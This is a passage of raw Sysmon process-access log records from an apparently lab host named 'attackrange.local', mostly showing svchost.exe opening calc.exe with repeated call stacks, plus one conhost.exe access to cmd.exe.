T4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361478Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361477Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361476Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361475Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361474Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361473Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361472Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361471Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361470Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361469Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361468Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361467Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361466Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361465Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361464Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361463Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361462Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361461Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361460Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361459Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361458Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361457Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-3708-6013-b403-000000001100}4072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361456Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 